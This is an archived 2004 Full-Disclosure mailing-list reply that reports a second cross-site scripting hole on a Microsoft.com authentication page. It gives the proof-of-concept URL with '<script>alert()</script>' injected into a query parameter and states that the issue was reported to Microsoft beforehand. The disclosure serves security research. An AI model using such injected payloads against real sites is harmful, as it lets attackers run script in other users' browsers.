[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Cross-Site-Scripting Vulnerability in Microsoft.com

To: full-disclosure@xxxxxxxxxxxxxxxx, Win2KSecAdvice@xxxxxxxxxxxxxx, vulnwatch@xxxxxxxxxxxxx, ntbugtraq@xxxxxxxxxxxxxxxxxxxxxx, Bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-Disclosure] Cross-Site-Scripting Vulnerability in Microsoft.com
From: offtopic <offtopic@xxxxxxx>
Date: Fri, 05 Nov 2004 09:34:22 +0300

Hmmm. Another one:

https://mocl.one.microsoft.com/cwdl/CW_Auth.asp?PartnerAction=pick&strErrorString=<script>alert()</script>

Vulnerability reported to the MS in September.
Published under RFPolicy. 

(c)oded by offtopic@xxxxxxx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
Next by Date: RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
Previous by thread: [Full-Disclosure] Cross-Site-Scripting Vulnerability in Microsoft.com
Next by thread: [Full-Disclosure] [SECURITY] [DSA 584-1] New dhcp packages fix format string vulnerability
Index(es):
- Date
- Thread